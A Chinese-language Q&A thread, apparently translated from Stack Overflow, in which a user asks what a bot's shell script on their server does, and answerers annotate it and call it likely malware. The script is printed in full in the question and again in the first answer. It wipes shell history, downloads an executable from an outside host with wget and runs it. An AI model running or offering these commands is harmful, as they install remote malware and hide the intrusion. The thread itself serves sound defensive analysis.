有人可以帮我解释机器人试图做什么吗?

时间:2016-05-01 14:25:20

标签: linux shell 

PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 
unset HISTFILE HISTLOG HISTORY 
HISTFILE=/dev/null 
HISTSIZE=0 
cd /bin/ 
wget http://wesaem.co.kr/download/m/5414 -O acxxxhruvc 
chmod + x acxxxhruvc /bin/acxxxhruvc 
good http://wesaem.co.kr/download/m/5414 -O acxxxhruvc 
chmod + x acxxxhruvc /bin/acxxxhruvc 
sleep 2 
mv /usr/bin/wget /usr/bin/good 
mv /bin/wget /bin/good 
ls -la /etc/daemon.cfg 
exit 0

2 个答案:

答案 0 :(得分:2)

我的评论内联如下

PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

unset HISTFILE HISTLOG HISTORY
HISTFILE=/dev/null
HISTSIZE=0

cd /bin/

#download an executable
wget http://wesaem.co.kr/download/m/5414 -O acxxxhruvc
chmod + x acxxxhruvc

#run the downloaded executable
/bin/acxxxhruvc
good http://wesaem.co.kr/download/m/5414 -O acxxxhruvc
#it seems like it downloads an executable to overwrite the existing one
chmod + x acxxxhruvc
/bin/acxxxhruvc

sleep 2

#remove the wget application and overwrite the good application with it
mv /usr/bin/wget /usr/bin/good
mv /bin/wget /bin/good

list the details of this daemon.cfg file
ls -la /etc/daemon.cfg

exit 0

基本上好的应用程序会被wget覆盖,我猜这个行为是一样的。

总的来说,它没有做你想要的任何事情。可能是恶意软件。

答案 1 :(得分:0)

如果您真的很好奇,只需下载可疑文件(acxxxhruvc)并进行调查(例如使用strings acxxxhruvc),或将其提交给某些扫描服务(例如{{3} })

在这种情况下,它是VirusTotal

的某些变体looks like
相关问题
最新问题